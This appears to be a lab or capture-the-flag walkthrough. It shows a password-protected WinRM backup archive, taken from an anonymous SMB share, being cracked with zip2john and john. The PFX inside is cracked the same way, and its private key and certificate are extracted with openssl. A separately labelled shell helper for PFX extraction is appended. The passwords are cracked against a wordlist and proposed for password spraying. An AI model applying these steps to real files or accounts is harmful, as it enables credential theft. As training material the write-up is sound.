winrm_backup


A backup archive has been found in one of the SMB shares that allows anonymous access. Judging by the name, the archive appears to be related to the WinRM service that the target system hosts over port 5986

┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ file winrm_backup.zip 
winrm_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
 
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ unzip winrm_backup.zip      
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 

The archive is a password-protected ZIP archive

Password Cracking


┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ zip2john winrm_backup.zip > winrm_backup.zip.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

zip2john turns the archive into a crackable hash string

┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ john ./winrm_backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2023-10-24 18:17) 4.545g/s 15806Kp/s 15806Kc/s 15806KC/s surki..supaluca
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The archive hash is cracked: the archive password is supremelegacy. The password may also be worth trying in a password spraying attack

PFX


┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ unzip winrm_backup.zip                                              
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
  inflating: legacyy_dev_auth.pfx    

The extracted content is a PFX file

A PFX file, also known as a PKCS #12 file, is a binary format file that is used to store a variety of cryptographic objects. This file format is typically used for securely storing a private key along with its associated X.509 digital certificate. It’s commonly used in situations where you need to export and back up a private key and certificate, such as in the context of SSL/TLS certificates for web servers or secure email communication.

Additionally, judging by the name of the file, the PFX file appears to belong to the legacyy user, and the legacyy user is [[Timelapse_RID_Cycling|confirmed]] to be a valid domain user through RID cycling (https://www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)

Extraction


As explained above, a lot can be done with a PFX file, since it can contain the server certificate, intermediate certificates, and the corresponding private key. It is also entirely possible to extract the public (certificate) and private key pair from a PFX file.

Cracking PFX


PFX files are typically encrypted with a password so that they can safely store sensitive material. Before the public/private keypair extraction described above, the PFX file itself has to be decrypted, since it is highly probable that it is password-protected.

┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hash

pfx2john turns the PFX file into a crackable hash string

┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ john ./legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:06 DONE (2023-10-24 18:37) 0.01502g/s 48535p/s 48535c/s 48535C/s thugwear..thugess
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The PFX hash is cracked: the PFX password is thuglegacy. This password may also be worth trying in a password spraying attack

Now that the decryption password is known, the public/private keypair extraction can proceed

Private Key


┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.private
Enter Import Password: thuglegacy
Enter PEM pass phrase: qwe123
Verifying - Enter PEM pass phrase: qwe123
 
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ file legacyy_dev_auth.private ; ll legacyy_dev_auth.private 
legacyy_dev_auth.private: ASCII text
4.0K -rw------- 1 kali kali 2.1K Oct 24 18:43 legacyy_dev_auth.private

Extracting the private key from the legacyy_dev_auth.pfx file. As expected, openssl prompts for the import password (thuglegacy). It additionally prompts for a PEM pass phrase, which is normal, as a PEM key file must have a passphrase to be functional. I set it to qwe123

Decryption

┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl rsa -in legacyy_dev_auth.private  -out legacyy_dev_auth.private.decrypted
Enter pass phrase for legacyy_dev_auth.private: qwe123
writing RSA key

This is now the private key, but it is still encrypted with the passphrase I set during the extraction step (qwe123), so it needs to be decrypted once more.

Public Key (Certificate)


┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.public
Enter Import Password: 

Extracting the public key (certificate) from the legacyy_dev_auth.pfx file. The import password (thuglegacy) is required here as well. However, unlike the private key extraction above, openssl does not prompt for a PEM pass phrase, since only the certificate is being exported

Since the output is a certificate rather than an encrypted private key, it does not require further decryption
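The three openssl steps above (private key, decryption, certificate) collapsed into a non-interactive helper, plus the check a practitioner wants before using the pair. This is an added example, not code from the write-up; it builds its own throwaway PFX with a constructed password rather than touching the lab file, and assumes openssl 1.1.1 or newer is on PATH.

```shell
# Added example (not from the original write-up). Generates a test PFX with a
# constructed password, then extracts key and certificate non-interactively.

make_test_pfx() {
  # Build a throwaway key + self-signed cert and bundle them as a PFX
  # protected with a weak password, mirroring the kind of file found above.
  local dir="$1" pass="$2"
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
      -subj "/CN=legacyy-test" \
      -keyout "$dir/test.key" -out "$dir/test.crt" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$dir/test.key" -in "$dir/test.crt" \
      -passout "pass:$pass" -out "$dir/test.pfx"
}

extract_pfx() {
  # Pull the private key and the certificate out of a PFX.
  # -passin replaces the "Enter Import Password" prompt; -nodes writes the
  # key unencrypted, so the extra PEM pass phrase round trip (and the later
  # `openssl rsa` decryption) is not needed. Returns 1 on a wrong password.
  local pfx="$1" pass="$2" outdir="$3"
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
      -out "$outdir/private.pem" 2>/dev/null || return 1
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -clcerts -nokeys \
      -out "$outdir/cert.pem" 2>/dev/null || return 1
}

keypair_matches() {
  # Sanity check: the certificate's public key must be the one that belongs
  # to the extracted private key (compare digests of the two SPKI blobs).
  local key="$1" cert="$2" k c
  k=$(openssl pkey -in "$key" -pubout 2>/dev/null | openssl sha256)
  c=$(openssl x509 -in "$cert" -pubkey -noout 2>/dev/null | openssl sha256)
  [ -n "$k" ] && [ "$k" = "$c" ]
}
```

On OpenSSL 3.x, a PFX exported by older Windows tooling with the RC2-based PBE may be refused until `-legacy` is added to the `openssl pkcs12 -in` commands.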